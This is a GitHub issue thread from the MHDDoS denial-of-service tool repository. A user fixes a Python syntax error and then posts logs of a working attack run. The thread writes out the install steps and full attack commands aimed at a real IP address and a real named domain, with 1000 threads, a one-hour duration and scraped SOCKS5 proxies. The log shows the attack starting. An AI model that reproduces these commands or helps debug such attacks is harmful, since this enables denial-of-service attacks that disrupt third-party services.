### ISSUE TITLE
error starting start.py - SyntaxError: invalid syntax

### ISSUE THREAD

**Issue by 12sunflowers** [MHProDev/MHDDoS#301]
**SOLUTION**
https://github.com/MHProDev/MHDDoS/issues/301#issuecomment-1079755074

### Version

2.4 (Default)

### Which section is the problem?

Script Base

### Please complete the following information

```true
- OS: Ubuntu
- Installed Requirements Version [e.g. PySocks1.70]
- Python Version 2,3

git clone https://github.com/MHProDev/MHDDoS.git
cd MHDDoS
pip install -r requirements.txt
```

### What happened (Describe the bug) ?

azureuser@SlavaUkraine:~/MHDDoS$ sudo python start.py STRESS https://195.50.7.181 5 1000 proxy.txt 100 3600 true
  File "start.py", line 42
    ctx: SSLContext = create_default_context(cafile=where())
       ^
SyntaxError: invalid syntax
azureuser@SlavaUkraine:~/MHDDoS$

### Screenshots

https://ibb.co/c16PZcr

### Relevant log output

```shell
azureuser@SlavaUkraine:~/MHDDoS$ sudo python start.py STRESS https://195.50.7.181 5 1000 proxy.txt 100 3600 true
  File "start.py", line 42
    ctx: SSLContext = create_default_context(cafile=where())
       ^
SyntaxError: invalid syntax
azureuser@SlavaUkraine:~/MHDDoS$

azureuser@SlavaUkraine:~/MHDDoS$ sudo python3 start.py
Traceback (most recent call last):
  File "start.py", line 27, in <module>
    from PyRoxy import Proxy, ProxyChecker, ProxyType, ProxyUtiles
ModuleNotFoundError: No module named 'PyRoxy'

azureuser@SlavaUkraine:~/MHDDoS$ sudo python2 start.py
  File "start.py", line 42
    ctx: SSLContext = create_default_context(cafile=where())
       ^
SyntaxError: invalid syntax
azureuser@SlavaUkraine:~/MHDDoS$ sudo python start.py
  File "start.py", line 42
    ctx: SSLContext = create_default_context(cafile=where())
       ^
SyntaxError: invalid syntax
azureuser@SlavaUkraine:~/MHDDoS$ 





```

### Your code

```true
azureuser@SlavaUkraine:~/MHDDoS$ sudo python start.py STRESS https://195.50.7.181 5 1000 proxy.txt 100 3600 true
  File "start.py", line 42
    ctx: SSLContext = create_default_context(cafile=where())
       ^
SyntaxError: invalid syntax
azureuser@SlavaUkraine:~/MHDDoS$
```

**Comment by SudoLite** [comment]
try again without `sudo`

**Comment by 12sunflowers** [comment]
same, its shown in my description

**Comment by 12sunflowers** [comment]
After reinstalling from git and use "python3" all works now!)
```

root@SlavaUkraine:/home/azureuser/MHDDoS# python3 start.py DGB https://cse-rus.ru 5 1000 proxy.txt 100 3600 true
[18:59:02 - WARNING] The file doesn't exist, creating files and downloading proxies.
[18:59:02 - INFO] Downloading Proxies from 14 Providers
[18:59:02 - DEBUG] Proxies from (URL: https://api.proxyscrape.com/?request=displayproxies&proxytype=socks5, Type: SOCKS5, Timeout: 5)
[18:59:02 - DEBUG] Proxies from (URL: https://api.proxyscrape.com/v2/?request=displayproxies&protocol=socks5, Type: SOCKS5, Timeout: 5)
[18:59:02 - DEBUG] Proxies from (URL: https://www.proxy-list.download/api/v1/get?type=socks5, Type: SOCKS5, Timeout: 5)
[18:59:02 - DEBUG] Proxies from (URL: https://www.proxyscan.io/download?type=socks5, Type: SOCKS5, Timeout: 5)
[18:59:02 - DEBUG] Proxies from (URL: https://raw.githubusercontent.com/ShiftyTR/Proxy-List/master/socks5.txt, Type: SOCKS5, Timeout: 5)
[18:59:02 - DEBUG] Proxies from (URL: https://www.my-proxy.com/free-socks-5-proxy.html, Type: SOCKS5, Timeout: 5)
[18:59:02 - DEBUG] Proxies from (URL: https://raw.githubusercontent.com/jetkai/proxy-list/main/online-proxies/txt/proxies-socks5.txt, Type: SOCKS5, Timeout: 5)
[18:59:02 - DEBUG] Proxies from (URL: https://api.openproxylist.xyz/socks5.txt, Type: SOCKS5, Timeout: 5)
[18:59:02 - DEBUG] Proxies from (URL: https://raw.githubusercontent.com/TheSpeedX/PROXY-List/master/socks5.txt, Type: SOCKS5, Timeout: 5)
[18:59:02 - DEBUG] Proxies from (URL: https://api.proxyscrape.com/v2/?request=displayproxies&protocol=socks5, Type: SOCKS5, Timeout: 5)
[18:59:02 - DEBUG] Proxies from (URL: https://www.freeproxychecker.com/result/socks4_proxies.txt, Type: SOCKS5, Timeout: 5)
[18:59:02 - DEBUG] Proxies from (URL: http://www.socks24.org/feeds/posts/default, Type: SOCKS5, Timeout: 5)
[18:59:02 - DEBUG] Proxies from (URL: https://www.freeproxychecker.com/result/socks5_proxies.txt, Type: SOCKS5, Timeout: 5)
[18:59:02 - DEBUG] Proxies from (URL: https://raw.githubusercontent.com/TheSpeedX/SOCKS-List/master/socks5.txt, Type: SOCKS5, Timeout: 5)
[18:59:03 - INFO] 2,981 Proxies are getting checked, this may take awhile!
[18:59:07 - INFO] Proxy Count: 10
[18:59:07 - INFO] Attack Started to cse-rus.ru with DGB method for 3600 seconds, threads: 1000!
[18:59:07 - DEBUG] Target: cse-rus.ru, Port: 443, Method: DGB PPS: 0, BPS: -- B / 0%
[18:59:08 - DEBUG] Target: cse-rus.ru, Port: 443, Method: DGB PPS: 0, BPS: -- B / 0%
[18:59:09 - DEBUG] Target: cse-rus.ru, Port: 443, Method: DGB PPS: 0, BPS: -- B / 0%
[18:59:10 - DEBUG] Target: cse-rus.ru, Port: 443, Method: DGB PPS: 0, BPS: -- B / 0%
[18:59:11 - DEBUG] Target: cse-rus.ru, Port: 443, Method: DGB PPS: 0, BPS: -- B / 0%
[18:59:12 - DEBUG] Target: cse-rus.ru, Port: 443, Method: DGB PPS: 0, BPS: -- B / 0%
[18:59:13 - DEBUG] Target: cse-rus.ru, Port: 443, Method: DGB PPS: 0, BPS: -- B / 0%
[18:59:14 - DEBUG] Target: cse-rus.ru, Port: 443, Method: DGB PPS: 0, BPS: -- B / 0%
[18:59:15 - DEBUG] Target: cse-rus.ru, Port: 443, Method: DGB PPS: 0, BPS: -- B / 0%
^[[M !7^[[M#!7^[[M !6[18:59:16 - DEBUG] Target: cse-rus.ru, Port: 443, Method: DGB PPS: 0, BPS: -- B / 0%
^[[M#%6[18:59:17 - DEBUG] Target: cse-rus.ru, Port: 443, Method: DGB PPS: 0, BPS: -- B / 0%
[18:59:18 - DEBUG] Target: cse-rus.ru, Port: 443, Method: DGB PPS: 0, BPS: -- B / 0%
```
